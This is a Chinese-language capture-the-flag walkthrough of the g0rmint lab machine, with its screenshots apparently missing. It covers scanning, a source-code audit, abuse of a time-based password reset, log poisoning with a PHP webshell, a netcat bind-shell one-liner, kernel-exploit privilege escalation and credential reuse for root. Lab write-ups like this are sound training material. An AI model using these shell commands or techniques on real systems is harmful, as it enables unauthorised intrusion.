g0rmint靶机实战

1、主机发现

arp-scan -l
靶机实战-g0rmint
目标IP:192.168.232.165

2、端口扫描

靶机实战-g0rmint
开放80、22端口

3、端口详细信息扫描

靶机实战-g0rmint

4、访问80端口–http服务

靶机实战-g0rmint
dirb扫一下其它目录
靶机实战-g0rmint
依次访问:
靶机实战-g0rmint
靶机实战-g0rmint
靶机实战-g0rmint
访问robots里面的地址:
靶机实战-g0rmint
靶机实战-g0rmint
一个登录页面,先尝试弱口令:
弱口令失败…
查看源码:
靶机实战-g0rmint
在html源代码中发现了一个不知道是什么东西的东西
尝试访问一下:
靶机实战-g0rmint
访问之后依旧是404,再用dirb爆一下目录:
靶机实战-g0rmint
访问之:
靶机实战-g0rmint
压缩包?下载看看:
靶机实战-g0rmint
网站源码,下面涉及到代码审计:绝望…
靶机实战-g0rmint
在login.php中可以看到,登录失败的时候会生成一个日志文件addlog($log, $reason);,看下这个addlog的代码
靶机实战-g0rmint
发现登录失败日志存储在/s3cr3t-dir3ct0ry-f0r-l0gs目录下,格式为年月日.php,尝试访问一下:
直接跳转到主页…
继续看代码,在db.sql中可以看到一条插入的数据
靶机实战-g0rmint
解密:
靶机实战-g0rmint
尝试登录无果,看到文件中有一个重置密码的文件reset.php:
靶机实战-g0rmint
可以看到,只需要知道一个存在的邮箱和用户名,就可以重置密码为一个时间值的哈希
那就开始搜索邮箱和用户名:
靶机实战-g0rmint
找到一个用户:noman([email protected]
尝试重置密码:
靶机实战-g0rmint
成功重置,界面右下角也给出了对应的时间,遂能算出相应的哈希值
获取重置后密码:
靶机实战-g0rmint
算出重置后的密码为:02525a60b812a7a650b2
登录:
靶机实战-g0rmint
登录成功,先改个密码:
靶机实战-g0rmint

5、getshell

查看登录日志:
靶机实战-g0rmint
登录失败日志记录着登录时的email信息,可以通过在登录的email处插入一句话木马,来获取shell:
靶机实战-g0rmint
在访问日志文件://利用hackbar提交post参数即可执行命令
靶机实战-g0rmint
然后尝试反弹shell

反弹shell方法一

cmd=mkfifo /tmp/t;
cmd=cat /tmp/t | /bin/sh -i 2>&1 | nc -l 4444 > /tmp/t
进入阻塞状态,在kali中用nc连接即可
靶机实战-g0rmint
靶机实战-g0rmint
在kali中用nc连接:
靶机实战-g0rmint

反弹shell方法二

靶机实战-g0rmint
靶机实战-g0rmint
查看kali://拿到shell
靶机实战-g0rmint

6、提权

方法一

查看内核版本:
靶机实战-g0rmint
kali搜索对应版本漏洞:
靶机实战-g0rmint
挑44298.c来试试,将这个文件复制到/var/www/html目录下://开启apache服务
靶机实战-g0rmint
下载到靶机:
靶机实战-g0rmint
编译:
靶机实战-g0rmint
没有安装gcc,尴尬…在kali编译好再上传吧:
靶机实战-g0rmint
靶机实战-g0rmint
执行://提示权限不够,赋权,再执行
靶机实战-g0rmint
提权成功

方法二

在/var/www目录下又发现网站备份文件,解压发现db.sql
靶机实战-g0rmint
靶机实战-g0rmint
查看db.sql文件:
靶机实战-g0rmint
发现用户noman以及密码:解密去
靶机实战-g0rmint
拿到用户名:noman 密码:tayyab123
因为这个靶机开放22端口,可以尝试去连接ssh
靶机实战-g0rmint
又翻回去看了一下
靶机实战-g0rmint
//g0rmint 有点可疑,用这个试一下:
靶机实战-g0rmint
成功登录
然后用sudo -l 查看当前用户是否属于sudo组,接着使用sudo -i 直接获得管理员权限
靶机实战-g0rmint
//全部命令都可以运行,nice

相关文章:

  • 2021-04-19
  • 2022-01-19
  • 2022-01-14
  • 2021-05-31
  • 2022-12-23
  • 2022-01-04
  • 2021-12-22
  • 2021-04-23
猜你喜欢
  • 2021-10-22
  • 2021-09-19
  • 2021-12-02
  • 2021-05-05
  • 2021-11-11
  • 2021-06-09
  • 2021-07-12
相关资源
相似解决方案